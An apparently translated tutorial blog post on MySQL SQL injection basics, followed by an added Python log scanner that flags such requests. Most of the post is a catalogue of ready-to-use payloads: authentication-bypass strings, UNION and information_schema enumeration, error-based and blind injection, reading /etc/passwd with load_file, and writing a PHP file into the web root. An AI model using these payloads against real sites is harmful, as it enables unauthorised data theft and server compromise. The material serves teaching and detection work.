SoFunction
Updated on 2025-03-10

Basic knowledge necessary for SQL injection

What is SQL Injection

A SQL injection attack is one in which the attacker inserts SQL commands into a web form input field or into the query string of a page request, tricking the server into executing malicious SQL. In some forms, the content entered by the user is used directly to construct (or influence) dynamic SQL commands, or is passed as an input parameter to a stored procedure; such forms are particularly vulnerable to SQL injection.

Common comment styles in MySQL

    #
    -- [space] or --+
    /*…*/

During injection, all of these comment markers may need to be URL-encoded.

MySQL authentication bypass

    ;%00
    ' or 1=1 #
    ' /*!or */ 1=1 --+

MySQL concatenation character

Use + in MySQL to concatenate.

select * from users where username='zhangsan' and "ab"="a"+"b";

Common MySQL functions

During SQL injection, MySQL's built-in functions are used. They can be divided into information functions and functional (utility) functions.

Information functions return information about the databases on the MySQL server; functional functions are ordinary functions that perform some operation.

Commonly used information functions are:

    database(): returns the currently used database
    version(): returns the database version, equivalent to @@version
    user(): returns the current user, equivalent to current_user. For example:

select user(); #root@localhost
select current_user; #root@localhost

    @@datadir: returns the storage location of the database.

select @@datadir; #D:\xampp\mysql\data\

Common functional functions are:

load_file(): loads a file from the server and reads its contents.

select * from users union select 1,load_file('/etc/passwd'),3;
select * from users union select 1,load_file(0x2F6574632F706173737764),3; # the hex form avoids the need for single quotes

into outfile: writes to a file, provided the database account has write permission.

select '<?php phpinfo(); ?>' into outfile '/var/www/html/';
select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/';

concat(): returns the string formed by concatenating its arguments. If any argument is NULL, the result is NULL.

The usage is as follows:

select concat(username,password) from users;

concat_ws(): the first parameter is the delimiter, and the remaining parameters are the field names.

select concat_ws(',',username,password) from users;

group_concat(): merges the results of multiple rows into one.

The usage is as follows:

select group_concat(username) from users;
# returns all usernames in the users table as a single row

substring(), substr(): used to extract part of a string. Usage: substr(str,pos,length); note that pos starts at 1.

select substr((select database()),1,1);

ascii(): returns the ASCII value of the character.

select ascii('a'); #97

length(): returns the length of the string.

For example:

select length("123456"); # 6

if(exp1,exp2,exp3): if exp1 evaluates to true, exp2 is returned; otherwise exp3 is returned.

For example:

select 1,2,if(1=1,3,-1); # 1,2,3
select 1,2,if(1=2,3,-1); # 1,2,-1

The above are the functions commonly used in SQL injection. There are also some functions that are used less often:

    now(): returns the current system time
    hex(): returns the hexadecimal encoding of the string
    unhex(): the reverse of hex()
    @@basedir: returns the MySQL installation directory
    @@version_compile_os: the operating system

MySQL database metadata

MySQL has a database called information_schema. It is an information database holding the details of all the other databases kept by the MySQL server, such as database names, tables, table field names and access permissions. Commonly used tables in information_schema are:

    schemata: stores information about all databases in MySQL; its contents match the result of show databases.
    tables: stores information about the tables in each database, describing in detail which schema a table belongs to, its table type and its engine. The result of show tables from security comes from this table.
    columns: describes in detail all the columns of a table and the information about each column. The result of show columns from users comes from this table.

The following uses the above three tables to obtain database information.

select database(); # current database
select schema_name from information_schema.schemata limit 0,1; # query databases
select table_name from information_schema.tables where table_schema=database() limit 0,1; # query tables
select column_name from information_schema.columns where table_name='users' limit 0,1; # query columns

SQL injection types

SQL injection can be roughly divided into regular injection and blind injection. Blind injection can in turn be divided into time-based blind injection and content-based (boolean) blind injection.
There are many explanations of SQL blind injection online, so it is not covered at length here; the concept is easiest to explain with concrete examples.
In time-delay injection, the commonly used functions are if() and sleep().

The basic SQL expression is as follows:

select * from users where id=1 and if(length(user())=14,sleep(3),1);
select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);

Wide byte injection

For wide byte injection, refer to the detailed explanation of wide byte injection. Wide byte injection is generally caused by a mismatch between the web page encoding and the database encoding, and %d5 or %df is used to bypass the escaping.

Summary of common MySQL statements

Regular injection

1' order by num # determine the number of fields
1' union select 1,2,3 # determine the number of fields
-1' union select 1,2,3 # determine which fields are displayed on the page
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata # show all databases in MySQL
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="dbname"/database()/hex(dbname) #
-1' union select 1,2,column_name from information_schema.columns where table_name="table_name" limit 0,1 #
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name"/hex(table_name) limit 0,1 #
-1' union select 1,2,3 AND '1'='1   # in case comments cannot be used

Double query injection

select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; # this form is often used in blind injection; gets the database name
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; # gets a table name from the current database

# Used as follows:
1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

This technique obtains the required information from the error message MySQL produces when executing the SQL command. It will be analysed in detail in a following article.

Boolean blind injection

1' and ascii(substr((select database()),1,1))>99
1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90

Boolean blind injection obtains information from the change in page content that depends on whether the SQL condition evaluates to true or false.

Time-based blind injection

1' AND if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) --+
1' AND if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+

The two forms above are equivalent. Time-based blind injection works differently from regular injection: it usually uses the if() and sleep() functions, and then judges from how long the page takes to respond whether sleep() was executed.

Whether or not sleep() executed yields the required information.
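As an added defender-side example (my own code, not from the original post), the following Python scans constructed web-server log lines for the statement patterns listed in the Regular injection, Double query, Boolean blind and Time-based blind sections above. The log format, indicator names and sample requests are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns drawn from the statement catalogue above; each is matched
# against the URL-decoded, comment-stripped, lower-cased query string.
INDICATORS = {
    "union_select": r"\bunion\s+(?:all\s+)?select\b",
    "schema_probe": r"\binformation_schema\.",
    "time_delay": r"\bsleep\s*\(",
    "error_based": r"\bfloor\s*\(\s*rand\s*\(",
    "file_access": r"\bload_file\s*\(|\binto\s+outfile\b",
    "auth_bypass": r"'\s*or\s+1\s*=\s*1\b",
    "boolean_blind": r"\bascii\s*\(\s*substr",
}

def normalize(query):
    # Decode twice: the page notes that comment markers are usually URL-encoded,
    # and payloads are sometimes double-encoded to get past a first decoder.
    text = unquote_plus(unquote_plus(query))
    # MySQL executes the body of /*! ... */, so keep it; drop ordinary comments.
    text = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", text)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(query):
    text = normalize(query)
    return [name for name, pat in INDICATORS.items() if re.search(pat, text)]

# Constructed access-log lines (sample data, not taken from the page).
LOG = [
    '10.0.0.5 - - [10/Mar/2025:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Mar/2025:10:00:02 +0000] "GET /item.php?id=-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20%23 HTTP/1.1" 200 734',
    '10.0.0.9 - - [10/Mar/2025:10:00:03 +0000] "GET /item.php?id=1%27%20and%20if(length(user())=14,sleep(3),1)%20--+ HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Mar/2025:10:00:04 +0000] "GET /login.php?u=%27%20/*!or%20*/%201=1%20--+&p=x HTTP/1.1" 302 0',
]

def scan_log(lines):
    # Returns (client_ip, matched_indicators) for every request that hit a pattern.
    findings = []
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "GET [^? ]*\?(\S*) ', line)
        if m:
            hits = classify(m.group(2))
            if hits:
                findings.append((m.group(1), hits))
    return findings
```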

Summary

The above is the essential basic knowledge for SQL injection. The next article will explain SQL injection in detail through examples; today's article serves mainly as background. Friends who are interested in SQL injection, please continue to follow me.